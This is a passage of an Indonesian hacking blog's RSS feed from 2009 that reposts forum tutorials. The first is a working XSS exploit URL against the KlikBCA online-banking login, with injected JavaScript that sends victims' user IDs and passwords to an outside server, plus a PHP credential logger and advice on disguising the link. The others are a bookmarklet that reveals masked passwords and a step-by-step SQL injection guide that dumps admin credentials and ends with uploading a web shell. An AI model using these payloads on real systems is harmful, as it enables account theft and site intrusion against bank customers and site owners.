		<comments>http://anaksapek.wordpress.com/2009/11/16/security-klikbca-recover-password-with-xss/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 08:21:49 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=201</guid>
		<description><![CDATA[Sudah baca majalah Underground Info ? Di majalah itu ada artikel yang ditulis oleh S’to tentang XSS di halaman login klikbca.com. Dalam tulisan ini saya bahas lebih jauh lagi dan saya berikan contoh exploit yang cukup berbahaya dari vulnerability yang ditemukan S’to di majalah tersebut. Maaf artikel ini bukan XSS basics, tentang apa itu XSS [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=201&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div>Sudah baca majalah Underground Info ? Di majalah itu ada artikel yang ditulis oleh S’to tentang XSS di halaman login klikbca.com. Dalam tulisan ini saya bahas lebih jauh lagi dan saya berikan contoh exploit yang cukup berbahaya dari vulnerability yang ditemukan S’to di majalah tersebut.<br />
Maaf artikel ini bukan XSS basics, tentang apa itu XSS nanti saya akan bahas di artikel khusus.</p>
<p>Sebenarnya XSS termasuk bug yang gawat dan susah diantisipasi, namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.</p>
<p>Mungkin mereka berpikir apa sih hal terburuk yang bisa menimpa server dengan XSS? Memang tidak secara langsung, namun ingat satu bug bisa di-exploit dengan 1001 macam cara yang semakin lama semakin efektif. Anda akan terkejut menyadari bahwa bug “seremeh” ini ternyata bisa diexploit sedemikian rupa.</p></div>
<div>
<span id="more-201"></span></p>
<p><strong>The Vulnerability</strong><br />
<img src="http://www.ilmuhacking.com/wp-content/uploads/2009/01/klikbca11-300x168.png" alt="Image" /></p>
<p>Bug XSS ini akan muncul bila kita memasukkan username dan password yang salah. Ketika kita salah mengisi password, maka akan muncul dialog box yang memberitahu bahwa password kita salah.</p>
<p>URL ketika password kita salah adalah:</p>
<div><strong>Code:</strong></div>
<div>https://ibank.klikbca.com/authentication.do?value(actions)=logout&amp;value(strError)=Mohon masukkan User ID/Password Anda yg benar \n (Please enter Your correct User ID/Password)</div>
<p>URL tersebut akan menghasilkan source html sebagai berikut:</p>
<div><strong>Code:</strong></div>
<div>&lt;script&gt;<br />
var err=‘User ID harus Alpha Numerik/User ID must be Alpha Numeric’<br />
alert(err);<br />
iBankForm.action=‘login.jsp’;<br />
iBankForm.submit();<br />
&lt;/script&gt;</div>
<p>Perhatikan bahwa setelah var err ditutup dengan karakter kutip (’). Jadi kalau kita ingin meng-injeksikan tag html atau javascript lain, kita harus tutup dulu dengan karakter (’). Mari kita coba untuk menampilkan dialog box berisi cookie dengan URL berikut:</p>
<div><strong>Code:</strong></div>
<div>https://ibank.klikbca.com/authentication.do?value(actions)=logout&amp;value(strError)=TEST‘;alert(document.cookie);&lt;!–</div>
<p>URL di atas menghasilkan source html berikut:</p>
<div><strong>Code:</strong></div>
<div>&lt;script type=“text/javascript”&gt;<br />
var err=‘TEST’;alert(document.cookie);&lt;!–‘<br />
alert(err);<br />
iBankForm.action=’login.jsp‘;<br />
iBankForm.submit();<br />
&lt;/script&gt;</div>
<p>Proses injeksi tersebut bisa dijelaskan dalam gambar berikut ini<br />
<img src="http://www.ilmuhacking.com/wp-content/uploads/2009/01/klikbca3-300x209.png" alt="Image" /><br />
Oke saya rasa cukup main-mainnya, saya tidak terlalu suka cookie, saya ingin lebih dari itu, saya ingin username dan password.</p>
<p><strong>Strategy and Tactics</strong><br />
Strategi yang saya pakai untuk mendapatkan username dan password sangatlah sederhana, yaitu dengan mengirimkan password dan username pada saat user meng-klik tombol submit. Untuk bisa menjalankan strategi itu saya menggunakan taktik berikut:</p>
<p>1. Meng-intercept klik tombol submit<br />
2. Mengirimkan user dan password ke server saya<br />
3. Mencatat user dan password di server saya</p>
<p><strong>Intercepting Submit Button</strong><br />
Saya menemukan kendala dalam mengintercept submit button. Kalau kita lihat pada source htmlnya button submit, kita akan temukan bahwa event onclick sudah di-hook untuk fungsi Login_Form_Validator. Setelah saya coba-coba, saya tidak bisa mengubah onclick itu ke fungsi lain.</p>
<div><strong>Code:</strong></div>
<div>1. &lt;input type=“Submit” value=“LOGIN” name=“value(Submit)”<br />
2. onclick=“javascript:return Login_Form_Validator(document.frmParam)”<br />
3. onmouseover=“this.style.cursor=’hand’” /&gt;</div>
<p>Fungsi Login_Form_Validator digunakan untuk melakukan validasi awal apakah kita mengisi user dan password sesuai format yang benar.</p>
<div><strong>Code:</strong></div>
<div>var blnSubmitted = false;<br />
function Login_Form_Validator( theForm ) {</p>
<p>document.forms[0]['value(user_id)'].autocomplete = ‘off’;<br />
document.forms[0]['value(pswd)'].autocomplete = ‘off’;</p>
<p>var blnResponse = false;<br />
if (blnSubmitted) {<br />
return false;<br />
}</p>
<p>var strErrMsg = “”;<br />
if( document.forms[0]['value(user_id)'].value == ”) {<br />
alert(“Silakan mengisi User ID anda/Please input your User ID”);<br />
document.forms[0]['value(user_id)'].focus();<br />
return false;<br />
}<br />
if( document.forms[0]['value(user_id)'].value.length&gt;12) {<br />
alert(“User ID/Password Anda salah / Your User ID/Password is Wrong”);<br />
document.forms[0]['value(user_id)'].select();<br />
document.forms[0]['value(user_id)'].focus();<br />
return false;<br />
}</p>
<p>if(document.forms[0]['value(pswd)'].value == ”) {<br />
alert(“Silakan mengisi PIN anda/Please input your PIN”);<br />
document.forms[0]['value(pswd)'].focus();<br />
return false;<br />
}<br />
if(document.forms[0]['value(pswd)'].value.length&lt;6) {<br />
alert(“PIN harus 6 Angka/PIN must be 6 digits”);<br />
document.forms[0]['value(pswd)'].focus();<br />
return false;<br />
}</p>
<p>//if(strErrMsg != ”) {<br />
// alert(strErrMsg);<br />
// return false;<br />
//}</p>
<p>//blnSubmitted = confirm(”Click OK to login.”);<br />
if ( !blnSubmitted ) {<br />
blnSubmitted = true;<br />
blnResponse = true;<br />
}</p>
<p>//if(’&lt; %= blnLogout %&gt;’==’true’)<br />
//blnResponse = false;</p>
<p>return blnResponse;<br />
}</p></div>
<p>Saya berpikir, bila mengubah onclick button ke fungsi lain tidak bisa, berarti kita harus menimpa fungsi Login_Form_Validator dengan fungsi kita sendiri. Biarkan event onclick button submit mengarah pada Login_Form_Validator, namun fungsi tersebut sudah kita ubah dengan code kita sendiri. Dengan kata lain kita define fungsi dengan nama yang sama, namun isi yang berbeda. Apakah itu akan menimbulkan dualisme fungsi? Iya tentu saja, karena satu fungsi yang sama tidak boleh di-definisikan dua kali.</p>
<p>Setelah saya perhatikan source htmlnya, ternyata saya diuntungkan dengan posisi fungsi Login_Form_Validator yang berada di baris paling bawah. Jadi yang saya lakukan adalah saya definisikan fungsi dengan nama Login_Form_Validator, dan kemudian saya buat browser untuk mengabaikan semua javascript di baris selanjutnya. Dengan cara ini fungsi Login_Form_Validator yang dikenal browser adalah Login_Form_Validator versi saya. Untuk itu saya tambahkan tag &lt;noscript&gt; dan tag awal komentar &lt;! agar javascript pada baris sesudahnya diabaikan browser.</p>
<p>Jadi URL untuk menjalankan taktik saya di atas adalah:</p>
<div><strong>Code:</strong></div>
<div>https://ibank.klikbca.com/authentication.do?value(actions)=login&amp;value(strError)=TEST‘;function Login_Form_Validator(theForm){alert(’TEST’);return false;}&lt;/script&gt;&lt;noscript&gt;&lt;!–</div>
<p>URL tersebut menghasilkan source html berikut:</p>
<div><strong>Code:</strong></div>
<div>&lt;script&gt;<br />
var err=‘TEST’;function Login_Form_Validator(theForm){alert(‘TEST’);return false;}&lt;/script&gt;&lt;noscript&gt;&lt;!–‘<br />
alert(err);<br />
iBankForm.action=’login.jsp‘;<br />
iBankForm.submit();<br />
&lt;/script&gt;</div>
<p><img src="http://www.ilmuhacking.com/wp-content/uploads/2009/01/klikbca4-300x196.png" alt="Image" /></p>
<p>Untuk menguji versi Login_Form_Validator manakah yang dipakai, klik tombol LOGIN tanpa mengisi username dan password. Ternyata yang muncul adalah dialog box “TEST”. Itu berarti fungsi yang berlaku adalah versi saya, HORE! Kalau versi aslinya, muncul peringatan bahwa user dan password harus diisi. Oke taktik pertama sukses. Mari kita Lanjut ke taktik ke-2.</p>
<p><strong>Sending username and password</strong></p>
<p>Oke, sekarang ketika user mengklik submit, code kita akan di-eksekusi. Now what? Selanjutnya tentu saja kita harus membuat code untuk mengirimkan user dan password pada saat user mengklik tombol submit. Untuk bisa mengirimkan data, berarti kita harus membuat browser melakukan request ke server saya. Saya menggunakan image untuk tujuan itu. Lho kok image? Iya karena ketika browser menemukan tag image, saat itu juga browser akan melakukan request GET ke server tempat image itu berada sesuai isi atribut SRC. Namun hal yang lebih penting lagi adalah, bila kita ubah atribut src dari object image dengan javascript, maka browser akan mengirimkan request GET sekali lagi. Request ini yang lebih penting, bukan request GET image pertama ketika halaman diload.</p>
<p>Saya definisikan tag image dengan dimensi 1×1 agar invisible, dengan nama myimage sebagai berikut:</p>
<div><strong>Code:</strong></div>
<div>&lt;img src=“http://www.ilmuhacking.com/testcapture.php“ name=“myimage” width=“1″ height=“1″&gt;</div>
<p>Sedangkan variabel yang berisi username dan password adalah:</p>
<div><strong>Code:</strong></div>
<div>document.forms[0]['value(user_id)'].value<br />
document.forms[0]['value(pswd)'].value</div>
<p>Agar bisa mengirimkan user dan password, saya harus mengubah atribut src myimage menjadi:</p>
<div><strong>Code:</strong></div>
<div>&#8216;http://www.ilmuhacking.com/testcapture.php?userid=‘+document.forms[0]['value(user_id)'].value+’&amp;passwd=’+document.forms[0]['value(pswd)'].value</div>
<p>Selanjutnya saya harus membuat fungsi Login_Form_Validator mengubah atribut src myimage, agar ketika submit button di-klik maka atribut src myimage akan berubah dan browser akan melakukan request GET ke isi atribut src. Hal yang tricky adalah jika return dari fungsi Login_Form_Validator adalah false, browser baru akan melakukan request image. Bila tidak, browser akan mengabaikan perubahan atribut src, dan tetap melakukan submit.</p>
<p>Untuk menyiasatinya, saya terpaksa membuat agar button submit harus di klik 2x. Pada klik yang pertama tidak terjadi submit sesungguhnya, hal ini saya manfaatkan untuk mengubah atribut src myimage dan mengirim username/password ke server saya. Pada klik ke-2, browser baru melakukan submit yang sesungguhnya. Agak aneh memang, tapi saya yakin kebanyakan user tidak akan menyadari dan akan melanjutkan dengan meng-klik sekali lagi.</p>
<p>Saya buat satu variabel abc yang bernilai false pertama kali. Pada klik pertama, nilai abc menjadi true, sehingga pada klik ke-2 fungsi tidak mengembalikan nilai false. Fungsi Login_Form_Validator adalah sebagai berikut:</p>
<div><strong>Code:</strong></div>
<div>var abc=false;<br />
function Login_Form_Validator(theForm {<br />
if (!abc) {<br />
document.images.myimage.src=‘http://www.ilmuhacking.com/testcapture.php‘+‘?userid=’+document.forms[0]['value(user_id)'].value+‘&amp;passwd=’+document.forms[0]['value(pswd)'].value;<br />
abc = true;<br />
return false;<br />
}<br />
}</div>
<p>Kini sudah lengkap semua yang dibutuhkan, siap untuk diinjeksikan melalui URL sebagai berikut:</p>
<div><strong>Code:</strong></div>
<div>https://ibank.klikbca.com/authentication.do?value(actions)=login&amp;value(strError)=TEST‘;var abc=false;function Login_Form_Validator(theForm){if (!abc) {abc=true;document.images.myimage.src=’http://www.ilmuhacking.com/testcapture.php?userid=‘%2Bdocument.forms[0]['value(user_id)'].value%2B’%26passwd=’%2Bdocument.forms[0]['value(pswd)'].value;return false;}}&lt;/script&gt;&lt;img name=”myimage” src=”http://www.ilmuhacking.com/testcapture.php” width=”1″ height=”1″&gt;&lt;noscript&gt;&lt;!–</div>
<p>URL di atas adalah EXPLOIT. Tugas attacker adalah membuat orang lain yang ingin login, meng-klik melalui link tersebut. Ada banyak cara untuk itu. Salah satunya adalah dengan membuat link dengan anchor text di samarkan, seperti ini:</p>
<p>Klik di sini untuk login.</p>
<p>Bila kita coba isi dengan username:abc1234 dan password:123456. Maka pada klik pertama akan ada request GET ke URL berikut ini:</p>
<div><strong>Code:</strong></div>
<div>http://www.ilmuhacking.com/testcapture.php?userid=abc1234&amp;passwd=123456</div>
<p>Baru pada klik ke-2, username dan password tersebut di-submit dengan request POST ke server yang benar.</p>
<p><strong>Saving User and Password</strong></p>
<p>Sekarang bagian yang paling mudah, yaitu menyimpan username dan password yang masuk. Dalam contoh ini saya gunakan URL <!-- w --><a rel="nofollow" href="http://www.ilmuhacking.com/testcapture.php">www.ilmuhacking.com/testcapture.php</a><!-- w --></p>
<p>Saya menyimpan user dan password dalam file capture.txt. Kode PHP yang saya gunakan untuk menyimpan user dan password adalah sebagai berikut:</p>
<div><strong>Code:</strong></div>
<div>&lt;?php<br />
$file=fopen(“capture.txt”,“a+”);<br />
$userid=$_GET["userid"];<br />
$passwd=$_GET["passwd"];<br />
$ipaddr=$_SERVER["REMOTE_ADDR"];<br />
$now = date(“Ymd H:i:s”);<br />
if (!empty($userid)) {<br />
fwrite($file,“$userid =&amp;amp;gt; $passwd (at $now from $ipaddr)\n“);<br />
}<br />
fclose($file);<br />
?&gt;</div>
<p>Kesimpulan:<br />
Ternyata bug yang di-remehkan seperti XSS sekalipun, bila di-exploit bisa jadi berbahaya. Saya telah buktikan dengan contoh sederhana ini. Di tangan orang yang tepat celah sekecil apapun bisa menjadi masalah besar. Pesan saya: Never Underestimate Vulnerabilities</p>
<p>Penggunaan enkripsi https sama sekali tidak berguna dalam kasus ini. Karena https hanya menjamin authentication dan confidentiality saja.</p></div>
<p>&nbsp;</p>
<p>source : http://forum.hackers-center.org/viewtopic.php?f=3&amp;t=3023</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/201/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/201/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/201/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/201/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/201/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/201/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/201/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/201/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/201/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/201/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/201/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/201/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/201/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/201/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=201&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/11/16/security-klikbca-recover-password-with-xss/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/01/klikbca11-300x168.png" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/01/klikbca3-300x209.png" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>

		<media:content url="http://www.ilmuhacking.com/wp-content/uploads/2009/01/klikbca4-300x196.png" medium="image">
			<media:title type="html">Image</media:title>
		</media:content>
	</item>
		<item>
		<title>Script untuk melihat password</title>
		<link>http://anaksapek.wordpress.com/2009/11/16/script-untuk-melihat-password/</link>
		<comments>http://anaksapek.wordpress.com/2009/11/16/script-untuk-melihat-password/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 08:17:06 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=198</guid>
		<description><![CDATA[yang sering ke warnet mungkin pernah mengalami waktu mau masuk ke suatu situs, ada yang pernah login dan passwordnya dalam bentuk asterix. Untuk melihat password yang tersembunyi gunakan script berikut ini. Code: javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j&#60;F.length; ++j) { f = F[j]; for (i=0; i&#60;f.length; ++i) { if (f[i].type.toLowerCase() == [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=198&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div>yang sering ke warnet mungkin pernah mengalami waktu mau masuk ke suatu situs, ada yang pernah login dan passwordnya dalam bentuk asterix.</p>
<p>Untuk melihat password yang tersembunyi gunakan script berikut ini.</p>
<div></div>
<div><strong>Code:</strong></div>
<div>javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j&lt;F.length; ++j) { f = F[j]; for (i=0; i&lt;f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22Passwords in forms on this page:\n\n%22 + s); else alert(%22There are no saved passwords in forms on this page.%22);})();</div>
<p>Caranya copas pada address bar dan kalo ada password yang tersembunyi langsung muncul di window baru.</p></div>
<p>&nbsp;</p>
<p>source : http://forum.hackers-center.org/viewtopic.php?f=3&amp;t=2895</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/198/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/198/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/198/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=198&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/11/16/script-untuk-melihat-password/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>
	</item>
		<item>
		<title>SQL Injection + Backdooring</title>
		<link>http://anaksapek.wordpress.com/2009/11/16/sql-injection-backdooring/</link>
		<comments>http://anaksapek.wordpress.com/2009/11/16/sql-injection-backdooring/#comments</comments>
		<pubDate>Mon, 16 Nov 2009 07:40:24 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[backdooring]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=193</guid>
		<description><![CDATA[&#8212;-&#62;&#62;&#62; 1 Kita tetapkan target terlebih dahulu contoh: [site]/news_Event/newsDetail.php?ID=2 Tambahkan karakter &#8216; pada akhir url atau menambahkan karakter &#8220;-&#8221; untuk melihat apakah ada vuln. contoh: [site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2&#8242; &#8212;-&#62;&#62;&#62; 2 mencari dan menghitung jumlah table yang ada dalam databasenya&#8230; gunakan perintah : +order+by+ contoh: [site]//news_Event/newsDetail.php?ID=-2+order+by+1&#8211; sekarang cek secara satu per satu contoh: [site]/news_Event/newsDetail.php?ID=-2+order+by+1&#8211; [site]/news_Event/newsDetail.php?ID=-2+order+by+2&#8211; [site]/news_Event/newsDetail.php?ID=-2+order+by+3&#8211; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=193&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>&#8212;-&gt;&gt;&gt; 1<br />
Kita tetapkan target terlebih dahulu<br />
contoh: [site]/news_Event/newsDetail.php?ID=2</p>
<p>Tambahkan karakter &#8216; pada akhir url atau menambahkan karakter &#8220;-&#8221; untuk melihat apakah ada vuln.<br />
contoh:<br />
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2&#8242;</p>
<p>&#8212;-&gt;&gt;&gt; 2<br />
mencari dan menghitung jumlah table yang ada dalam databasenya&#8230;<br />
gunakan perintah : +order+by+</p>
<p>contoh:<br />
[site]//news_Event/newsDetail.php?ID=-2+order+by+1&#8211;</p>
<p><span id="more-193"></span></p>
<p>sekarang cek secara satu per satu<br />
contoh:<br />
[site]/news_Event/newsDetail.php?ID=-2+order+by+1&#8211;<br />
[site]/news_Event/newsDetail.php?ID=-2+order+by+2&#8211;<br />
[site]/news_Event/newsDetail.php?ID=-2+order+by+3&#8211;<br />
[site]/news_Event/newsDetail.php?ID=-2+order+by+4&#8211;</p>
<p>sehingga muncul error atau hilang pesan error&#8230;<br />
misal:<br />
[site]/news_Event/newsDetail.php?ID=-2+order+by+5&#8211;</p>
<p>berarti yang kita ambil adalah sampai angka 4<br />
menjadi<br />
[site]/news_Event/newsDetail.php?ID=-2+union+select+4&#8211;</p>
<p>&#8212;&gt;&gt;&gt; 3<br />
untuk mengeluarkan angka berapa yang muncul gunakan perintah union<br />
karena tadi error sampai angka 5<br />
maka:<br />
[site]/news_Event/newsDetail.php?ID=-2+order+by+4&#8211;</p>
<p>ok ,yg keluar angka 2<br />
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi<br />
contoh:<br />
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4&#8211;</p>
<p>lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema<br />
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema</p>
<p>&#8212;&gt;&gt;&gt; 4<br />
Untuk menampilkan semua isi dari table tsb adalah<br />
perintah group_concat(table_name) -&gt; dimasukan pada angka yg keluar tadi<br />
perintah +from+information_schema.tables+where+table_schema=database()&#8211; -&gt; dimasukan setelah angka terakhir</p>
<p>contoh:<br />
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()&#8211;</p>
<p>seumpama yg kita cari adalah &#8220;admin&#8221;</p>
<p>&#8212;&gt;&gt;&gt; 5<br />
Perintah group_concat(column_name) -&gt; dimasukan pada angka yg keluar tadi<br />
perintah +from+information_schema.columns+where+table_name=0xhexa&#8211; -&gt; dimasukan setelah angka terakhir</p>
<p>[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa&#8211;</p>
<p>pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.<br />
website yg digunakan untuk konversi :</p>
<p>http://tools.vyc0d.com/converter/</p>
<p>contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e</p>
<p>[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e&#8211;</p>
<p>&#8212;&gt;&gt;&gt; 6<br />
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara</p>
<p>perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -&gt; dimasukan pada angka yg keluar tadi<br />
perintah +from+(nama table berasal) -&gt; dimasukan setelah angka terakhir</p>
<p>[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)&#8211;</p>
<p>contoh kata yang keluar adalah adminID,Name,password</p>
<p>maka<br />
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin&#8211;</p>
<p>Nah dah nemu ID dan password-nya sekarang <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>ket: 0x3a sama dengan : &gt;&gt; 7<br />
Mencari halaman login Admin<br />
Login sebagai admin<br />
Cari fitur2 upload file atau gambar, lalu upload shell kalian<br />
ENJOY&#8230;&#8230;.. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Untuk lebih lengkapX dunlut video-nya di http://www.4shared.com/file/106354474/2e7d11e2/SQLi_Backdooring_by_vyc0d.html</p>
<p>pass : israelserverisdown</p>
<p>&#8212;&#8212;&#8212;&#8212;-<br />
Wassalam</p>
<p>vYc0d</p>
<p>_________________<br />
Talk less&#8230;Code more!!!</p>
<p>source : http://forum.hackers-center.org/viewtopic.php?f=9&amp;t=2517</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/anaksapek.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/anaksapek.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/anaksapek.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/anaksapek.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/anaksapek.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/anaksapek.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/anaksapek.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/anaksapek.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/anaksapek.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/anaksapek.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/anaksapek.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/anaksapek.wordpress.com/193/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/anaksapek.wordpress.com/193/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/anaksapek.wordpress.com/193/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=193&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://anaksapek.wordpress.com/2009/11/16/sql-injection-backdooring/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/9e7b9db864103ecaef1c9dc2b5f8134f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">anaksapek</media:title>
		</media:content>
	</item>
		<item>
		<title>LINUX LIVE-FLASHDISK</title>
		<link>http://anaksapek.wordpress.com/2009/10/22/linux-live-flashdisk/</link>
		<comments>http://anaksapek.wordpress.com/2009/10/22/linux-live-flashdisk/#comments</comments>
		<pubDate>Thu, 22 Oct 2009 08:56:51 +0000</pubDate>
		<dc:creator>anaksapek</dc:creator>
				<category><![CDATA[linux]]></category>

		<guid isPermaLink="false">http://anaksapek.wordpress.com/?p=187</guid>
		<description><![CDATA[linux<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=anaksapek.wordpress.com&amp;blog=5446579&amp;post=187&amp;subd=anaksapek&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Langkah-langkah membuat Linux LIVE-FLASHDISK  yakni :</p>
<p>1.  Siapkan sebuah FD kosong dengan kapasitas &gt;= 1Gb</p>
